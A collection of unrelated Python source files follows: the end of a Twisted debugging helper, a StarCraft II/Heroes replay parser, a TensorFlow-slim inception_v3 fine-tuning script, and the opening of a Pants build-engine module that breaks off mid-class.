def printBriefTraceback(self, file=None, elideFrameworkCode=0):
    """Print a traceback as densely as possible."""
    self.printTraceback(file=file,
                        elideFrameworkCode=elideFrameworkCode,
                        detail='brief')
def printDetailedTraceback(self, file=None, elideFrameworkCode=0):
    """Print a traceback with detailed locals and globals information."""
    self.printTraceback(file=file,
                        elideFrameworkCode=elideFrameworkCode,
                        detail='verbose')
# slyphon: make post-morteming exceptions tweakable
# When True, _debuginit drops into a pdb post-mortem for implicitly-created
# Failures (i.e. Failure() with no explicit exception info).
DO_POST_MORTEM = True

def _debuginit(self, exc_value=None, exc_type=None, exc_tb=None,
               Failure__init__=Failure.__init__.im_func):
    """
    Debugging replacement for Failure.__init__ (installed by
    startDebugMode): when the Failure is being built from the exception
    currently being handled, jump into pdb for a post-mortem first, then
    delegate to the original initializer.

    NOTE(review): Python 2 only (`print` statement, ``im_func``).
    """
    if (exc_value, exc_type, exc_tb) == (None, None, None):
        exc = sys.exc_info()
        # Don't post-mortem Failures raised as control flow (raise self).
        if not exc[0] == self.__class__ and DO_POST_MORTEM:
            print "Jumping into debugger for post-mortem of exception '%s':" % exc[1]
            import pdb
            pdb.post_mortem(exc[2])
    Failure__init__(self, exc_value, exc_type, exc_tb)
def startDebugMode():
    """Enable debug hooks for Failures.

    Replaces Failure.__init__ with _debuginit so every implicitly-created
    Failure triggers a pdb post-mortem (see DO_POST_MORTEM above).
    """
    Failure.__init__ = _debuginit
# Sibling imports - at the bottom and unqualified to avoid unresolvable
# circularity
#import log # commented by teratorn
| |
from datetime import datetime
import hashlib
# Library to read Blizzards MPYQ files
import mpyq
# Import the oldest protocol to read the replay header, which works with every
# replay version
from s2protocol import protocol15405
from heroprotocol import protocol29406
## Evaluates blizzard based replays and provides several methods to get data out of it.
#
# Currently provides these methods/data:
#  - Get the match winner
#  - Get a match object containing several information of the match
class teBlizzardReplayParser:
    # Class-level defaults kept for backward compatibility only.
    # BUGFIX: the real caches are now created per instance in __init__;
    # previously these mutable class attributes were shared between ALL
    # parser instances, so a second parser would see (and append to) the
    # first replay's cached events.
    replayHeader = {}
    replayDetails = {}
    replayInitData = {}
    replayGameEvents = []
    replayMessageEvents = []
    replayTrackerEvents = []
    replayAttributeEvents = []

    # Events counting into the APM of a player
    apmEvents = ['NNet.Game.SSelectionDeltaEvent',
                 'NNet.Game.SCmdEvent',
                 'NNet.Game.SControlGroupUpdateEvent']

    # Mapping of gamespeed identifiers
    gamespeeds = {0: 'Slower',
                  1: 'Slow',
                  2: 'Normal',
                  3: 'Fast',
                  4: 'Faster'}

    # Mapping of region codes
    regionCodes = {1: 'us',   # us.battle.net
                   2: 'eu',   # eu.battle.net
                   3: 'kr',   # kr.battle.net
                   5: 'cn',   # cn.battle.net
                   6: 'sea'}  # sea.battle.net

    # "Constants"
    PLAYER_CONTROL_HUMAN = 2
    PLAYER_CONTROL_AI = 3
    PLAYER_OBSERVE_IS_NO_OBSERVER = 0
    PLAYER_OBSERVE_IS_OBSERVER = 1
    PLAYER_OBSERVE_IS_HOST = 2
    RESULT_WINNER = 1
    RESULT_LOSER = 2

    GAME_PROTOCOLS = {
        "sc2": {
            "protocol": "s2protocol",
            "programId": "S2"
        },
        "hero": {
            "protocol": "heroprotocol",
            "programId": "Hero"
        }
    }

    ## Constructor of teBlizzardReplayParser.
    #
    # Creates an instance of the mpq-archive reader, reads the replay header
    # to find out the base build of the replay and therefore load the correct
    # protocol version. Will raise an exception if the basebuild is unknown.
    #
    # Fallback to sc2 for backward compatible reasons
    def __init__(self, replayFilename, game="sc2"):
        if game not in self.GAME_PROTOCOLS:
            raise UnknownGameException(game)
        self.game = game
        self.replayFilename = replayFilename
        # Per-instance caches (shadow the class-level defaults above).
        self.replayHeader = {}
        self.replayDetails = {}
        self.replayInitData = {}
        self.replayGameEvents = []
        self.replayMessageEvents = []
        self.replayTrackerEvents = []
        self.replayAttributeEvents = []
        self.mpqArchive = mpyq.MPQArchive(self.replayFilename)
        # The header's baseBuild determines which protocol to use (reading
        # the header works with every protocol version).
        baseBuild = self.getHeader()['m_version']['m_baseBuild']
        packageName = self.GAME_PROTOCOLS[game]["protocol"]
        if __package__ is not None:
            packageName = '%s.%s' % (__package__, packageName)
        try:
            # Will raise an ImportError-exception if the basebuild is unknown
            self.protocol = __import__(packageName + '.protocol%s' % baseBuild,
                                       fromlist=[packageName])
        except ImportError:
            raise UnknownBaseBuildException(baseBuild)

    ## Returns the (cached) replay header decoded with the base protocol.
    def getHeader(self):
        if len(self.replayHeader) <= 0:
            # Read the protocol header, this can be read with any protocol
            self.replayHeader = protocol15405.decode_replay_header(
                self.mpqArchive.header['user_data_header']['content'])
        return self.replayHeader

    ## Returns the (cached) replay details section.
    def getDetails(self):
        if len(self.replayDetails) <= 0:
            self.replayDetails = self.protocol.decode_replay_details(
                self.mpqArchive.read_file('replay.details'))
            # Some old replays also (additionally to the initData) have these
            # senseless cache_handles including invalid unicode chars
            # del self.replayDetails['m_cacheHandles']
        return self.replayDetails

    ## Returns the (cached) replay initData section.
    def getInitData(self):
        if len(self.replayInitData) <= 0:
            self.replayInitData = self.protocol.decode_replay_initdata(
                self.mpqArchive.read_file('replay.initData'))
            # Drop these senseless cache_handles including invalid unicode chars
            del self.replayInitData['m_syncLobbyState']['m_gameDescription']['m_cacheHandles']
        return self.replayInitData

    ## Returns the (cached) list of game events.
    def getGameEvents(self):
        if len(self.replayGameEvents) <= 0:
            # The decoder returns a generator; materialize all events once.
            gameGenerator = self.protocol.decode_replay_game_events(
                self.mpqArchive.read_file('replay.game.events'))
            for event in gameGenerator:
                self.replayGameEvents.append(event)
        return self.replayGameEvents

    ## Returns the (cached) list of chat/message events.
    def getMessageEvents(self):
        if len(self.replayMessageEvents) <= 0:
            # The decoder returns a generator; materialize all events once.
            messageGenerator = self.protocol.decode_replay_message_events(
                self.mpqArchive.read_file('replay.message.events'))
            for event in messageGenerator:
                self.replayMessageEvents.append(event)
        return self.replayMessageEvents

    ## Returns the (cached) list of tracker events, enriched with '_unit_tag'.
    def getTrackerEvents(self):
        if len(self.replayTrackerEvents) <= 0:
            # The decoder returns a generator; materialize all events once.
            trackerGenerator = self.protocol.decode_replay_tracker_events(
                self.mpqArchive.read_file('replay.tracker.events'))
            for event in trackerGenerator:
                # BUGFIX: dict.has_key() is Python-2-only; `in` works everywhere.
                if 'm_unitTagIndex' in event and 'm_unitTagRecycle' in event:
                    # Directly generate the unit_tag, as we will need it anyways.
                    event['_unit_tag'] = self.protocol.unit_tag(
                        event['m_unitTagIndex'], event['m_unitTagRecycle'])
                self.replayTrackerEvents.append(event)
        return self.replayTrackerEvents

    ## Returns the (cached) attribute events section.
    def getAttributeEvents(self):
        if len(self.replayAttributeEvents) <= 0:
            self.replayAttributeEvents = self.protocol.decode_replay_attributes_events(
                self.mpqArchive.read_file('replay.attributes.events'))
        return self.replayAttributeEvents

    ## Remove some HTML from a string.
    #
    # Remove known HTML which appears in strings. Currently:
    # <sp/>
    #
    # @param self The object pointer.
    # @param string The string to remove the HTML from.
    #
    # @return string The tidied string.
    def stripHtmlFromString(self, string):
        return string.replace('<sp/>', ' ')

    ## Remove zero bytes (\x00) from a string.
    #
    # Some strings contain zero bytes which destroys the string
    #
    # @param self The object pointer.
    # @param string The string to remove the zero bytes from.
    #
    # @return string The tidied string.
    def stripZeroBytesFromString(self, string):
        return str(string.strip(u'\u0000'))

    ## Convert a Windows NT timestamp to a UNIX timestamp.
    #
    # Windows has its own timestamp format and Blizzard uses it. This method
    # decodes this timestamp using a tutorial linked in the @see.
    #
    # @param self The object pointer.
    # @param ntTimestamp The Windows NT timestamp to convert.
    #
    # @see http://support.citrix.com/article/CTX109645
    #
    # @return int The UNIX timestamp for the given NT timestamp.
    def convertWindowsNtTimestampToUnixTimestamp(self, ntTimestamp):
        # BUGFIX: use floor division so Python 2 and Python 3 agree
        # (NT timestamps are 100ns ticks since 1601-01-01; the offset to
        # the UNIX epoch is 11644473600 seconds).
        return ntTimestamp // 10000000 - 11644473600

    ## Convert the timezone offset from nanoseconds to hours.
    #
    # The timezone offset is stored as 100 nanoseconds, so for example UTC+2
    # would be 2 * 60*60*10^7 = 72000000000.
    #
    # @param self The object pointer.
    # @param timezoneOffset The UTC timezone offset in 100 nanoseconds
    #
    # @return int The UTC timezone offset in hours
    def convertTimezoneOffsetToUtcTimezone(self, timezoneOffset):
        # 60*60*10^7 = 36000000000
        # BUGFIX: floor division keeps the result an int on Python 3 as well.
        return timezoneOffset // 36000000000

    ## Returns the player-dict for a given toon.
    #
    # Steps through all players and immediately stops and returns the player
    # for the given toon. The toon seems to be the battlenet-worldwide-unique
    # identifier of a player.
    #
    # @param self The object pointer.
    # @param toon The unique identifier to find the player for.
    #
    # @return dict|None The player dict or None if not found.
    def getPlayerEntryForToon(self, toon):
        playersList = self.getDetails()['m_playerList']
        for i, player in enumerate(playersList):
            # There are invalid chars (0bytes or sth) in these strings, so strip
            # them before comparing.
            player['m_toon']['m_programId'] = self.stripZeroBytesFromString(
                player['m_toon']['m_programId'])
            playerToon = (str(player['m_toon']['m_region']) + '-' +
                          player['m_toon']['m_programId'] + '-' +
                          str(player['m_toon']['m_realm']) + '-' +
                          str(player['m_toon']['m_id']))
            if playerToon == toon:
                # playerIds are 1-based.
                player['m_playerId'] = i + 1
                return player
        return None

    ## Returns the player-dict for a given workingSetSlotId.
    #
    # Steps through all players and immediately stops and returns the player
    # for the given workingSetSlotId.
    #
    # @param self The object pointer.
    # @param slotId The workingSetSlotId to find the player for.
    #
    # @return dict|None The player dict or None if not found.
    def getPlayerEntryForSlotId(self, slotId):
        playersList = self.getDetails()['m_playerList']
        for i, player in enumerate(playersList):
            # There are invalid chars (0bytes or sth) in these strings, so strip
            # them before comparing.
            player['m_toon']['m_programId'] = self.stripZeroBytesFromString(
                player['m_toon']['m_programId'])
            if player['m_workingSetSlotId'] == slotId:
                # playerIds are 1-based.
                player['m_playerId'] = i + 1
                return player
        return None

    ## Returns the player-dict who has won the match.
    #
    # Steps through all players and immediately stops and returns the player
    # when found.
    #
    # @param self The object pointer.
    #
    # @return dict|None The winning player dict or None if not found.
    def getMatchWinner(self):
        playersList = self.getDetails()['m_playerList']
        for player in playersList:
            if player['m_result'] == self.RESULT_WINNER:
                return player
        return None

    ## Returns the match size / game mode (XonX).
    #
    # Looks up the special attribute scope 16, containing general match
    # attributes, and looks for attribute 2001, the match size.
    #
    # @param self The object pointer.
    #
    # @return string|None The match size in format 'XvX' or None if not found.
    def getGameMode(self):
        attributeEvents = self.getAttributeEvents()
        if 16 in attributeEvents['scopes']:
            if 2001 in attributeEvents['scopes'][16]:
                return attributeEvents['scopes'][16][2001][0]['value']
        return None

    ## Tries to generate a unique md5 hash, like a matchId.
    #
    # This hash tries to be a battlenet-matchId replacement, but is NOT
    # guaranteed to be globally unique!
    # But it's unique enough to determine the rounds of a bestOfX match for
    # example. That means that every replay from any participant (player,
    # observer, etc.) of a single match generates the same hash, so you
    # know which replays belong to one match and therefore for one round
    # in a bestOfX match.
    # For generating the hash, the userIds assigned to the toonHandles of every
    # player is used, plus the randomSeed, which is randomly generated per
    # match, but is not unique!
    #
    # @param self The object pointer.
    # @param players The list of players, generated by self.getMatchDetails()
    #
    # @return string The generated replayHash
    def generateReplayHash(self, players):
        initData = self.getInitData()
        hashData = []
        # Iterate over our playerList and concatenate the userId with the
        # toonHandle
        for key, player in players['humans'].items():
            hashData.append(str(player['user_id']) + ':' + player['toon']['handle'])
        # Also append the randomSeed, which makes it kinda "unique"
        hashData.append(str(initData['m_syncLobbyState']['m_lobbyState']['m_randomSeed']))
        # Hash our data with the md5 algorithm and return it.
        # BUGFIX: md5() requires bytes on Python 3; encoding ASCII data is a
        # no-op on Python 2, so the hash value is unchanged.
        return hashlib.md5(';'.join(hashData).encode('utf-8')).hexdigest()

    ## Returns the match document incl. various information about the match.
    #
    # Builds the match document with the list of players, observers, computers,
    # map name, the matchwinner, duration, matchtime, etc...
    #
    # @param self The object pointer.
    #
    # @return dict The match document.
    def getMatchDetails(self):
        details = self.getDetails()
        header = self.getHeader()
        initData = self.getInitData()
        playersInLobby = initData['m_syncLobbyState']['m_userInitialData']
        slots = initData['m_syncLobbyState']['m_lobbyState']['m_slots']
        players = {'humans': {},
                   'computers': {}}
        observers = {}
        teams = []
        matchWinnerToon = -1
        matchWinnerTeam = -1
        # TODO: This loop may need some refactoring to make it less complex!
        for slot in slots:
            # AIs don't have a userId, so we have to get the playername via the playerList
            if slot['m_control'] == self.PLAYER_CONTROL_AI:
                player = self.getPlayerEntryForSlotId(slot['m_workingSetSlotId'])
                playerName = self.stripHtmlFromString(player['m_name'] if player['m_name'] else '')
                clanTag = ''
                userId = -1
                # AIs also don't have a toon, but we need them! So generate an
                # 'invalid' one out of the playerId
                toonHandle = ('0-' + str(self.GAME_PROTOCOLS[self.game]["programId"]) +
                              '-0-' + str(player['m_playerId']))
            elif slot['m_userId'] != None:
                userId = slot['m_userId']
                playerName = self.stripHtmlFromString(
                    playersInLobby[userId]['m_name'] if playersInLobby[userId]['m_name'] else '')
                clanTag = self.stripHtmlFromString(
                    playersInLobby[userId]['m_clanTag'] if playersInLobby[userId]['m_clanTag'] else '')
                toonHandle = slot['m_toonHandle']
            else:
                # Empty slot: neither AI nor human.
                continue
            # Create a dict containing information for every type of user
            data = {'user_id': userId,
                    # Some kind of a unique identifier
                    'toon': {'handle': toonHandle},
                    'name': playerName,
                    'clan_tag': clanTag,
                    'fullname': (('[' + clanTag + ']') if len(clanTag) > 0 else '') + playerName,
                    'team_id': slot['m_teamId']}
            # Collect all teamIDs
            if not data['team_id'] in teams:
                teams.append(data['team_id'])
            if slot['m_observe'] > self.PLAYER_OBSERVE_IS_NO_OBSERVER:
                observers[toonHandle] = data
            else:
                player = self.getPlayerEntryForSlotId(slot['m_workingSetSlotId'])
                # Something strange happened: The user is not in the playerslist!
                if player == None:
                    continue
                # Is this the matchwinner (for team matches, the toonHandle doesn't matter)?
                if player['m_result'] == self.RESULT_WINNER:
                    matchWinnerToon = toonHandle
                    matchWinnerTeam = data['team_id']
                # Merge the toon handle with the full toon identity.
                # BUGFIX: dict(a.items() + b.items()) is Python-2-only;
                # copy + update behaves identically on both versions.
                toonData = dict(data['toon'])
                toonData.update({'programId': player['m_toon']['m_programId'],
                                 'region': player['m_toon']['m_region'],
                                 'id': player['m_toon']['m_id'],
                                 'realm': player['m_toon']['m_realm']})
                data.update({'player_id': player['m_playerId'],
                             'toon': toonData,
                             'race': player['m_race'],
                             'result': player['m_result'],
                             'color': {'r': player['m_color']['m_r'],
                                       'g': player['m_color']['m_g'],
                                       'b': player['m_color']['m_b'],
                                       'a': player['m_color']['m_a']}})
                if slot['m_control'] == self.PLAYER_CONTROL_AI:
                    players['computers'][toonHandle] = data
                else:
                    players['humans'][toonHandle] = data
        gameMode = self.getGameMode()
        # Fallback, if the attribute couldn't be found
        if not gameMode:
            # BUGFIX: floor division so Python 3 doesn't produce '2.0v2.0'.
            playersPerTeam = len(players['humans']) // len(teams)
            gameMode = '%dv%d' % (playersPerTeam, playersPerTeam)
        return {'mapname': details['m_title'],
                'replay_hash': self.generateReplayHash(players),
                'started_at': datetime.fromtimestamp(
                    self.convertWindowsNtTimestampToUnixTimestamp(
                        details['m_timeUTC'])).strftime('%Y-%m-%d %H:%M:%S'),
                'utc_timezone': self.convertTimezoneOffsetToUtcTimezone(details['m_timeLocalOffset']),
                # Game loops run at 16 per second.
                'duration': round(header['m_elapsedGameLoops'] // 16),
                'winner_toon_handle': matchWinnerToon,
                'winner_team_id': matchWinnerTeam,
                'version': {'number': (str(header['m_version']['m_major']) + '.' +
                                       str(header['m_version']['m_minor']) + '.' +
                                       str(header['m_version']['m_revision'])),
                            'build': header['m_version']['m_build']},
                'gamemode': gameMode,
                'gamespeed': self.gamespeeds[initData['m_syncLobbyState']['m_gameDescription']['m_gameSpeed']],
                # NOTE(review): `or -1` also maps a hostUserId of 0 to -1 —
                # presumably intended for None; confirm before changing.
                'host_user_id': initData['m_syncLobbyState']['m_lobbyState']['m_hostUserId'] or -1,
                'players': players,
                'observers': observers}
# End class teBlizzardReplayParser
class UnknownBaseBuildException(Exception):
    """Raised when no protocol module exists for a replay's base build."""

    def __init__(self, baseBuild):
        self.baseBuild = baseBuild

    def __str__(self):
        return 'Unsupported base build %d' % self.baseBuild
class UnknownGameException(Exception):
    """Raised when the requested game has no entry in GAME_PROTOCOLS."""

    def __init__(self, game):
        self.game = game

    def __str__(self):
        return 'Unsupported game %s' % self.game
| |
from datasets import dataset_factory
import tensorflow as tf
import matplotlib.pyplot as plt
import tensorflow.contrib.slim as slim
from nets import nets_factory
from preprocessing import preprocessing_factory
import numpy as np
class SlimTrainMgr():
    """Fine-tunes a TF-slim image-classification network (TF 1.x API).

    All knobs are plain instance attributes set in __init__ with sane
    defaults; run() overrides them for the flowers/inception_v3 fine-tune
    and kicks off slim.learning.train.
    """

    def __init__(self):
        # --- Dataset ---
        self.dataset_name = 'flowers'
        self.dataset_split_name = 'train'
        self.dataset_dir = '/home/levin/workspace/detection/data/flower'
        self.num_readers = 4
        self.batch_size = 32
        self.labels_offset = 0
        self.train_image_size = None
        # --- Model ---
        self.model_name = 'inception_v3'  # The name of the architecture to train.
        self.weight_decay = 0.00004  # The weight decay on the model weights.
        self.preprocessing_name = None
        self.num_preprocessing_threads = 4
        # --- Learning-rate schedule ---
        self.num_epochs_per_decay = 2.0
        self.learning_rate_decay_type = 'exponential'
        # BUGFIX: learning_rate_decay_factor was never initialized, so the
        # default 'exponential' decay path raised AttributeError. 0.94 is the
        # conventional slim default.
        self.learning_rate_decay_factor = 0.94
        self.end_learning_rate = 0.0001
        self.learning_rate = 0.01
        # --- Optimizer ---
        self.optimizer = 'rmsprop'
        self.adadelta_rho = 0.95
        self.opt_epsilon = 1.0
        self.adagrad_initial_accumulator_value = 0.1
        self.adam_beta1 = 0.9
        self.adam_beta2 = 0.999
        self.ftrl_learning_rate_power = -0.5
        self.ftrl_initial_accumulator_value = 0.1
        self.ftrl_l1 = 0.0
        self.ftrl_l2 = 0.0
        self.momentum = 0.9
        self.rmsprop_decay = 0.9
        self.rmsprop_momentum = 0.9
        # --- Training loop / checkpointing ---
        self.train_dir = '/tmp/tfmodel/'
        self.max_number_of_steps = None
        self.log_every_n_steps = 10
        self.save_summaries_secs = 600
        self.save_interval_secs = 600
        self.checkpoint_path = None
        self.checkpoint_exclude_scopes = None
        self.ignore_missing_vars = False
        self.label_smoothing = 0
        # BUGFIX: trainable_scopes was only assigned inside run(); any other
        # caller of __get_variables_to_train hit an AttributeError.
        self.trainable_scopes = None

    def __get_images_labels(self):
        """Build the input pipeline and return a prefetched (images, labels) batch."""
        dataset = dataset_factory.get_dataset(
            self.dataset_name, self.dataset_split_name, self.dataset_dir)
        provider = slim.dataset_data_provider.DatasetDataProvider(
            dataset,
            num_readers=self.num_readers,
            common_queue_capacity=20 * self.batch_size,
            common_queue_min=10 * self.batch_size)
        [image, label] = provider.get(['image', 'label'])
        label -= self.labels_offset
        network_fn = nets_factory.get_network_fn(
            self.model_name,
            num_classes=(dataset.num_classes - self.labels_offset),
            weight_decay=self.weight_decay,
            is_training=True)
        train_image_size = self.train_image_size or network_fn.default_image_size
        preprocessing_name = self.preprocessing_name or self.model_name
        image_preprocessing_fn = preprocessing_factory.get_preprocessing(
            preprocessing_name,
            is_training=True)
        image = image_preprocessing_fn(image, train_image_size, train_image_size)
        images, labels = tf.train.batch(
            [image, label],
            batch_size=self.batch_size,
            num_threads=self.num_preprocessing_threads,
            capacity=5 * self.batch_size)
        labels = slim.one_hot_encoding(
            labels, dataset.num_classes - self.labels_offset)
        batch_queue = slim.prefetch_queue.prefetch_queue(
            [images, labels], capacity=2)
        images, labels = batch_queue.dequeue()
        # Stash the network and dataset for __setup_training.
        self.network_fn = network_fn
        self.dataset = dataset
        return images, labels

    def __configure_learning_rate(self, num_samples_per_epoch, global_step):
        """Configures the learning rate.

        Args:
            num_samples_per_epoch: The number of samples in each epoch of training.
            global_step: The global_step tensor.
        Returns:
            A `Tensor` representing the learning rate.
        Raises:
            ValueError: if learning_rate_decay_type is not recognized.
        """
        decay_steps = int(num_samples_per_epoch / self.batch_size *
                          self.num_epochs_per_decay)
        if self.learning_rate_decay_type == 'exponential':
            return tf.train.exponential_decay(self.learning_rate,
                                              global_step,
                                              decay_steps,
                                              self.learning_rate_decay_factor,
                                              staircase=True,
                                              name='exponential_decay_learning_rate')
        elif self.learning_rate_decay_type == 'fixed':
            return tf.constant(self.learning_rate, name='fixed_learning_rate')
        elif self.learning_rate_decay_type == 'polynomial':
            return tf.train.polynomial_decay(self.learning_rate,
                                             global_step,
                                             decay_steps,
                                             self.end_learning_rate,
                                             power=1.0,
                                             cycle=False,
                                             name='polynomial_decay_learning_rate')
        else:
            # BUGFIX: the message is now actually formatted (the old code
            # passed the scheme name as a second ValueError argument).
            raise ValueError('learning_rate_decay_type [%s] was not recognized'
                             % self.learning_rate_decay_type)

    def __configure_optimizer(self, learning_rate):
        """Configures the optimizer used for training.

        Args:
            learning_rate: A scalar or `Tensor` learning rate.
        Returns:
            An instance of an optimizer.
        Raises:
            ValueError: if self.optimizer is not recognized.
        """
        if self.optimizer == 'adadelta':
            optimizer = tf.train.AdadeltaOptimizer(
                learning_rate,
                rho=self.adadelta_rho,
                epsilon=self.opt_epsilon)
        elif self.optimizer == 'adagrad':
            optimizer = tf.train.AdagradOptimizer(
                learning_rate,
                initial_accumulator_value=self.adagrad_initial_accumulator_value)
        elif self.optimizer == 'adam':
            optimizer = tf.train.AdamOptimizer(
                learning_rate,
                beta1=self.adam_beta1,
                beta2=self.adam_beta2,
                epsilon=self.opt_epsilon)
        elif self.optimizer == 'ftrl':
            optimizer = tf.train.FtrlOptimizer(
                learning_rate,
                learning_rate_power=self.ftrl_learning_rate_power,
                initial_accumulator_value=self.ftrl_initial_accumulator_value,
                l1_regularization_strength=self.ftrl_l1,
                l2_regularization_strength=self.ftrl_l2)
        elif self.optimizer == 'momentum':
            optimizer = tf.train.MomentumOptimizer(
                learning_rate,
                momentum=self.momentum,
                name='Momentum')
        elif self.optimizer == 'rmsprop':
            optimizer = tf.train.RMSPropOptimizer(
                learning_rate,
                decay=self.rmsprop_decay,
                momentum=self.rmsprop_momentum,
                epsilon=self.opt_epsilon)
        elif self.optimizer == 'sgd':
            optimizer = tf.train.GradientDescentOptimizer(learning_rate)
        else:
            # BUGFIX: format the message instead of passing a second arg.
            raise ValueError('Optimizer [%s] was not recognized' % self.optimizer)
        return optimizer

    def __get_variables_to_train(self):
        """Returns a list of variables to train.

        Returns:
            A list of variables to train by the optimizer (all trainable
            variables when trainable_scopes is None).
        """
        if self.trainable_scopes is None:
            return tf.trainable_variables()
        scopes = [scope.strip() for scope in self.trainable_scopes.split(',')]
        variables_to_train = []
        for scope in scopes:
            variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)
            variables_to_train.extend(variables)
        return variables_to_train

    def __setup_training(self, images, labels):
        """Build the loss, optimizer and train op, then run slim training."""
        tf.logging.set_verbosity(tf.logging.INFO)
        logits, end_points = self.network_fn(images)
        #############################
        # Specify the loss function #
        #############################
        aux_loss = None
        if 'AuxLogits' in end_points:
            # Inception-style auxiliary head, weighted at 0.4 as usual.
            aux_loss = tf.losses.softmax_cross_entropy(
                logits=end_points['AuxLogits'], onehot_labels=labels,
                label_smoothing=self.label_smoothing, weights=0.4, scope='aux_loss')
        total_loss = tf.losses.softmax_cross_entropy(
            logits=logits, onehot_labels=labels,
            label_smoothing=self.label_smoothing, weights=1.0)
        if aux_loss is not None:
            total_loss = total_loss + aux_loss
        global_step = slim.create_global_step()
        # Variables to train.
        variables_to_train = self.__get_variables_to_train()
        learning_rate = self.__configure_learning_rate(self.dataset.num_samples, global_step)
        optimizer = self.__configure_optimizer(learning_rate)
        train_op = slim.learning.create_train_op(total_loss, optimizer,
                                                 variables_to_train=variables_to_train)
        self.__add_summaries(end_points, learning_rate, total_loss)
        ###########################
        # Kicks off the training. #
        ###########################
        slim.learning.train(
            train_op,
            logdir=self.train_dir,
            init_fn=self.__get_init_fn(),
            number_of_steps=self.max_number_of_steps,
            log_every_n_steps=self.log_every_n_steps,
            save_summaries_secs=self.save_summaries_secs,
            save_interval_secs=self.save_interval_secs)

    def __add_summaries(self, end_points, learning_rate, total_loss):
        """Register activation, loss, variable and learning-rate summaries."""
        for end_point in end_points:
            x = end_points[end_point]
            tf.summary.histogram('activations/' + end_point, x)
            tf.summary.scalar('sparsity/' + end_point, tf.nn.zero_fraction(x))
        for loss in tf.get_collection(tf.GraphKeys.LOSSES):
            tf.summary.scalar('losses/%s' % loss.op.name, loss)
        # Add total_loss to summary.
        tf.summary.scalar('total_loss', total_loss)
        # Add summaries for variables.
        for variable in slim.get_model_variables():
            tf.summary.histogram(variable.op.name, variable)
        tf.summary.scalar('learning_rate', learning_rate)

    def __get_init_fn(self):
        """Returns a function run by the chief worker to warm-start the training.

        Note that the init_fn is only run when initializing the model during the
        very first global step.

        Returns:
            An init function run by the supervisor, or None when no
            checkpoint should be restored.
        """
        if self.checkpoint_path is None:
            return None
        # Warn the user if a checkpoint exists in the train_dir. Then we'll be
        # ignoring the checkpoint anyway.
        if tf.train.latest_checkpoint(self.train_dir):
            tf.logging.info(
                'Ignoring --checkpoint_path because a checkpoint already exists in %s'
                % self.train_dir)
            return None
        exclusions = []
        if self.checkpoint_exclude_scopes:
            exclusions = [scope.strip()
                          for scope in self.checkpoint_exclude_scopes.split(',')]
        # TODO(sguada) variables.filter_variables()
        variables_to_restore = []
        for var in slim.get_model_variables():
            excluded = False
            for exclusion in exclusions:
                if var.op.name.startswith(exclusion):
                    excluded = True
                    break
            if not excluded:
                variables_to_restore.append(var)
        if tf.gfile.IsDirectory(self.checkpoint_path):
            checkpoint_path = tf.train.latest_checkpoint(self.checkpoint_path)
        else:
            checkpoint_path = self.checkpoint_path
        tf.logging.info('Fine-tuning from %s' % checkpoint_path)
        return slim.assign_from_checkpoint_fn(
            checkpoint_path,
            variables_to_restore,
            ignore_missing_vars=self.ignore_missing_vars)

    def run(self):
        """Configure and launch the fine-tuning session."""
        # Fine tune the new (head) parameters.
        self.train_dir = '/tmp/flowers-models/inception_v3'
        self.dataset_name = 'flowers'
        self.dataset_split_name = 'train'
        self.dataset_dir = '/home/levin/workspace/detection/data/flower'
        self.model_name = 'inception_v3'
        self.checkpoint_path = '/home/levin/workspace/detection/data/trained_models/inception_v3/inception_v3.ckpt'
        self.checkpoint_exclude_scopes = 'InceptionV3/Logits,InceptionV3/AuxLogits'
        self.trainable_scopes = 'InceptionV3/Logits,InceptionV3/AuxLogits'
        self.max_number_of_steps = 1000
        self.batch_size = 32
        self.learning_rate = 0.01
        self.learning_rate_decay_type = 'fixed'
        self.save_interval_secs = 600
        self.save_summaries_secs = 60
        self.log_every_n_steps = 100
        self.optimizer = 'rmsprop'
        self.weight_decay = 0.00004
        # Fine tune all parameters (overrides the head-only settings above).
        self.train_dir = '/tmp/flowers-models/inception_v3/all'
        self.checkpoint_path = '/tmp/flowers-models/inception_v3'
        self.checkpoint_exclude_scopes = None
        self.trainable_scopes = None
        self.max_number_of_steps = 500
        self.learning_rate = 0.0001
        self.log_every_n_steps = 10
        images, labels = self.__get_images_labels()
        self.__setup_training(images, labels)
if __name__ == "__main__":
    # Script entry point: build the training manager and run the full pipeline.
    SlimTrainMgr().run()
| |
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
from collections import OrderedDict, namedtuple
from twitter.common.collections.orderedset import OrderedSet
from pants.base.exceptions import TaskError
from pants.base.workunit import WorkUnit
from pants.engine.engine import Engine
from pants.engine.round_manager import RoundManager
class GoalExecutor(object):
  """Executes (or, in explain mode, reports) all installed tasks of one goal."""

  def __init__(self, context, goal, tasktypes_by_name):
    """
    :param context: The pants run context shared by all tasks.
    :param goal: The goal whose tasks this executor runs.
    :param tasktypes_by_name: OrderedDict of task name -> task type; note it is
      iterated with ``reversed`` below, so it is expected in reverse execution order.
    """
    self._context = context
    self._goal = goal
    self._tasktypes_by_name = tasktypes_by_name

  @property
  def goal(self):
    # The goal this executor is responsible for.
    return self._goal

  def attempt(self, explain):
    """Attempts to execute the goal's tasks in installed order.

    :param bool explain: If ``True`` then the goal plan will be explained instead of being
                         executed.
    """
    # Each goal gets its own workdir under pants_workdir; each task a subdir of it.
    goal_workdir = os.path.join(self._context.options.for_global_scope().pants_workdir,
                                self._goal.name)
    with self._context.new_workunit(name=self._goal.name, labels=[WorkUnit.GOAL]):
      for name, task_type in reversed(self._tasktypes_by_name.items()):
        with self._context.new_workunit(name=name, labels=[WorkUnit.TASK]):
          if explain:
            self._context.log.debug('Skipping execution of {} in explain mode'.format(name))
          else:
            task_workdir = os.path.join(goal_workdir, name)
            task = task_type(self._context, task_workdir)
            task.execute()

      if explain:
        # Emit the name->task mapping in execution order for the explain report.
        reversed_tasktypes_by_name = reversed(self._tasktypes_by_name.items())
        goal_to_task = ', '.join(
          '{}->{}'.format(name, task_type.__name__) for name, task_type in reversed_tasktypes_by_name)
        print('{goal} [{goal_to_task}]'.format(goal=self._goal.name, goal_to_task=goal_to_task))
class RoundEngine(Engine):
  """An engine that executes goals in data-dependency order.

  Goals are visited to discover the products their tasks consume, producing a
  goal-level dependency graph that is topologically sorted so each goal runs
  only after the goals that produce the data it needs.
  """

  class DependencyError(ValueError):
    """Indicates a Task has an unsatisfiable data dependency."""

  class GoalCycleError(DependencyError):
